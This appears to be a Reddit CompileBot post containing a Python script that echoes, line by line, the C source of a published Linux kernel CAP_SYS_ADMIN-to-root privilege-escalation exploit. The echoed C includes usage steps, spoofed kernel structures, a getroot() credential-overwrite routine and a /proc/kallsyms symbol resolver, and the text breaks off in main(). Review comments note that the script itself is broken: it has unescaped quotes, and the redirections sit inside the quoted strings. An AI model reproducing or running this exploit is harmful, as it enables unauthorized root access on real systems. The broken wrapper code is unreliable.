+/u/CompileBot python
# Flat script with no definitions: every statement below shells out through
# os.system(), so each string is handed to the system shell verbatim. All the
# strings are literals (nothing is interpolated from input), and every one of
# them names the same hard-coded file, x.c, in the current working directory.
#
# Read top to bottom, the echoed text is the header and body of a C source
# file whose own comment block describes it as a Linux kernel CAP_SYS_ADMIN
# privilege-escalation exploit built around the Phonet socket family. The
# script is cut off after the `main()` prologue, so the remainder of that C
# text is not visible here.
#
# NOTE(review): as written, this module does not parse as Python — several of
# the literals (the SYM_NAME lines and the sprintf/popen/fscanf/fprintf/printf
# lines) contain unescaped double quotes inside a double-quoted string, and
# some echo arguments contain an apostrophe inside the single-quoted shell
# argument. The code is left byte-identical here; only comments are added.
import os
# `touch x.c` creates the file if it does not already exist.
os.system("touch x.c")
# Each of the following lines passes one line of C text to `echo`. Note that
# the `> x.c` redirection text sits inside the single-quoted echo argument on
# every line, and the operator used is `>` (truncate), not `>>` (append).
os.system("echo '/* > x.c '")
os.system("echo ' * Linux Kernel CAP_SYS_ADMIN to Root Exploit 2 (32 and 64-bit) > x.c '")
os.system("echo ' * by Joe Sylve > x.c '")
os.system("echo ' * @jtsylve on twitter > x.c '")
os.system("echo ' * > x.c '")
os.system("echo ' * Released: Jan 7, 2011 > x.c '")
os.system("echo ' * > x.c '")
os.system("echo ' * Based on the bug found by Dan Rosenberg (@djrbliss) > x.c '")
os.system("echo ' * only loosly based on his exploit http://www.exploit-db.com/exploits/15916/ > x.c '")
os.system("echo ' * > x.c '")
os.system("echo ' * Usage: > x.c '")
os.system("echo ' * gcc -w caps-to-root2.c -o caps-to-root2 > x.c '")
os.system("echo ' * sudo setcap cap_sys_admin+ep caps-to-root2 > x.c '")
os.system("echo ' * ./caps-to-root2 > x.c '")
os.system("echo ' * > x.c '")
os.system("echo ' * Kernel Version >= 2.6.34 (untested on earlier versions) > x.c '")
os.system("echo ' * > x.c '")
os.system("echo ' * Tested on Ubuntu 10.10 64-bit and Ubuntu 10.10 32-bit > x.c '")
os.system("echo ' * > x.c '")
os.system("echo ' * This exploit takes advantage of the same underflow as the original, > x.c '")
os.system("echo ' * but takes a different approach. Instead of underflowing into userspace > x.c '")
os.system("echo ' * (which doesn't work on 64-bit systems and is a lot of work), I underflow > x.c '")
os.system("echo ' * to some static values inside of the kernel which are referenced as pointers > x.c '")
os.system("echo ' * to userspace. This method is pretty simple and seems to be reliable. > x.c '")
os.system("echo ' */ > x.c '")
os.system("echo ' > x.c '")
# C preprocessor includes and the two skeleton structs of the echoed source.
os.system("echo '#include <stdio.h> > x.c '")
os.system("echo '#include <sys/socket.h> > x.c '")
os.system("echo '#include <errno.h> > x.c '")
os.system("echo '#include <string.h> > x.c '")
os.system("echo '#include <sys/mman.h> > x.c '")
os.system("echo '#include <unistd.h> > x.c '")
os.system("echo ' > x.c '")
os.system("echo '// Skeleton Structures of the Kernel Structures we're going to spoof > x.c '")
os.system("echo 'struct proto_ops_skel { > x.c '")
os.system("echo ' int family; > x.c '")
os.system("echo ' void *buffer1[8]; > x.c '")
os.system("echo ' int (*ioctl)(void *, int, long); > x.c '")
os.system("echo ' void *buffer2[12]; > x.c '")
os.system("echo '}; > x.c '")
os.system("echo ' > x.c '")
os.system("echo 'struct phonet_protocol_skel { > x.c '")
os.system("echo ' void *ops; > x.c '")
os.system("echo ' void *prot; > x.c '")
os.system("echo ' int sock_type; > x.c '")
os.system("echo '}; > x.c '")
os.system("echo ' > x.c '")
os.system("echo ' > x.c '")
# The C text from here to the `#endif` line selects per-architecture
# constants and typedefs (64-bit branch first, 32-bit in the #else).
os.system("echo '#ifdef __x86_64__ > x.c '")
os.system("echo ' > x.c '")
os.system("echo '#define SYM_NAME "local_port_range" > x.c '")
os.system("echo '#define SYM_ADDRESS 0x0000007f00000040 > x.c '")
os.system("echo '#define SYM_OFFSET 0x0 > x.c '")
os.system("echo ' > x.c '")
os.system("echo 'typedef int (* _commit_creds)(unsigned long cred); > x.c '")
os.system("echo 'typedef unsigned long (* _prepare_kernel_cred)(unsigned long cred); > x.c '")
os.system("echo ' > x.c '")
os.system("echo '#else //32-bit > x.c '")
os.system("echo ' > x.c '")
os.system("echo '#define SYM_NAME "pn_proto" > x.c '")
os.system("echo '#define SYM_ADDRESS 0x4e4f4850 > x.c '")
os.system("echo '#define SYM_OFFSET 0x90 > x.c '")
os.system("echo ' > x.c '")
os.system("echo 'typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred); > x.c '")
os.system("echo 'typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred); > x.c '")
os.system("echo ' > x.c '")
os.system("echo '#endif > x.c '")
os.system("echo ' > x.c '")
os.system("echo ' > x.c '")
os.system("echo '_commit_creds commit_creds; > x.c '")
os.system("echo '_prepare_kernel_cred prepare_kernel_cred; > x.c '")
os.system("echo ' > x.c '")
# Echoed C functions: getroot(), get_kernel_sym() (reads /proc/kallsyms via
# popen), and the start of main(). The main() text is truncated below.
os.system("echo 'int getroot(void * v, int i, long l) > x.c '")
os.system("echo '{ > x.c '")
os.system("echo ' commit_creds(prepare_kernel_cred(0)); > x.c '")
os.system("echo ' return 0; > x.c '")
os.system("echo '} > x.c '")
os.system("echo ' > x.c '")
os.system("echo '/* thanks spender... */ > x.c '")
os.system("echo 'unsigned long get_kernel_sym(char *name) > x.c '")
os.system("echo '{ > x.c '")
os.system("echo ' FILE *f; > x.c '")
os.system("echo ' unsigned long addr; > x.c '")
os.system("echo ' char dummy; > x.c '")
os.system("echo ' char sname[512]; > x.c '")
os.system("echo ' int ret; > x.c '")
os.system("echo ' > x.c '")
os.system("echo ' char command[512]; > x.c '")
os.system("echo ' > x.c '")
os.system("echo ' sprintf(command, "grep \"%s\" /proc/kallsyms", name); > x.c '")
os.system("echo ' > x.c '")
os.system("echo ' f = popen(command, "r"); > x.c '")
os.system("echo ' > x.c '")
os.system("echo ' while(ret != EOF) { > x.c '")
os.system("echo ' ret = fscanf(f, "%p %c %s\n", (void **) &addr, &dummy, sname); > x.c '")
os.system("echo ' > x.c '")
os.system("echo ' if (ret == 0) { > x.c '")
os.system("echo ' fscanf(f, "%s\n", sname); > x.c '")
os.system("echo ' continue; > x.c '")
os.system("echo ' } > x.c '")
os.system("echo ' > x.c '")
os.system("echo ' if (!strcmp(name, sname)) { > x.c '")
os.system("echo ' > x.c '")
os.system("echo ' fprintf(stdout, " [+] Resolved %s to %p\n", name, (void *)addr); > x.c '")
os.system("echo ' pclose(f); > x.c '")
os.system("echo ' return addr; > x.c '")
os.system("echo ' } > x.c '")
os.system("echo ' } > x.c '")
os.system("echo ' > x.c '")
os.system("echo ' pclose(f); > x.c '")
os.system("echo ' return 0; > x.c '")
os.system("echo '} > x.c '")
os.system("echo ' > x.c '")
os.system("echo 'int main(int argc, char * argv[]) > x.c '")
os.system("echo '{ > x.c '")
os.system("echo ' > x.c '")
os.system("echo ' int sock, proto; > x.c '")
os.system("echo ' unsigned long proto_tab, low_kern_sym, pn_proto; > x.c '")
os.system("echo ' void * map; > x.c '")
os.system("echo ' > x.c '")
os.system("echo ' /* Create a socket to load the module for symbol support */ > x.c '")
os.system("echo ' printf("[*] Testing Phonet support and CAP_SYS_ADMIN...\n"); > x.c '")
os.system("echo ' sock = socket(PF_PHONET, SOCK_DGRAM, 0); > x.c '")
os.system("echo ' > x.c '")
os.system("echo ' if(sock < 0) { > x.c '")
os.system("echo ' if(errno == EPERM) > x.c '")
os.system("echo ' printf("[*] You don't have CAP_SYS_ADMIN.\n"); > x.c '")